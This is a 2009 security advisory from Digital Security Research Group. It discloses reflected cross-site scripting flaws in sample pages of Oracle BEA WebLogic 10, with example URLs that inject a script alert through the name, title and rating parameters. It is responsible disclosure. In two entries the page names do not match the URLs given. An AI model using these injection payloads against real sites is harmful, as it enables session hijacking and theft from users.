Oracle BEA Weblogic 10 Cross Site Scripting

`  
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002  
  
  
Application: Oracle BEA Weblogic 10   
Versions Affected: Oracle BEA Weblogic 10   
Vendor URL: http://oracle.com  
Bugs: Multiple XSS Vulnerabilities in samples  
Exploits: YES  
Reported: 16.07.2008  
Vendor response: 18.07.2008   
Last response: 30.10.2008  
Description: reviewService sample of WebLogic Server.   
Date of Public Advisory: 13.01.2009   
Authors: Alexandr Polyakov  
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)  
  
  
Description  
***********  
  
  
Multiple XSS Vulnerabilities found in Oracle BEA Weblogic Server samples version 10.2 and latest.  
  
  
  
Details  
*******  
  
Vulnerabilities found in reviewService sample of Weblogic Server.  
  
1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter "name"  
  
  
Example  
*******  
http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>  
  
  
2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title"  
  
  
Example  
*******  
http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>  
  
  
3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"  
  
Example  
*******  
http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script>  
  
4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"  
  
Example  
*******  
http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script>  
  
5. Also there are a couple of XSS vulnerabilities in POST parameters in scripts:  
  
  
http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp  
http://testserver.com:7001/reviewService/ClientServlet  
http://testserver.com:7001/reviewService/InterceptorClientServlet  
http://testserver.com:7001/reviewService/createArtist_service.jsp  
http://testserver.com:7001/reviewService/createArtist_session.jsp  
  
Fix Information  
***************  
  
This is Security-In-Depth vulnerability, because was found in samples.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm)   
Vulnerability issues that result in significant modification of Oracle code or documentation in future releases,  
but are not of such a critical nature that they are distributed in Critical Patch Updates.  
  
  
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html   
  
  
Credits  
*******  
Oracle give a credits for Alexander Polyakov from Digital Security Company in Security-In-Depth program of CPU January 2009.  
  
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html   
  
  
About  
*****  
  
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
  
Contact: research [at] dsec [dot] ru  
http://www.dsecrg.ru   
http://www.dsec.ru  
  
  
  
  
  
  
`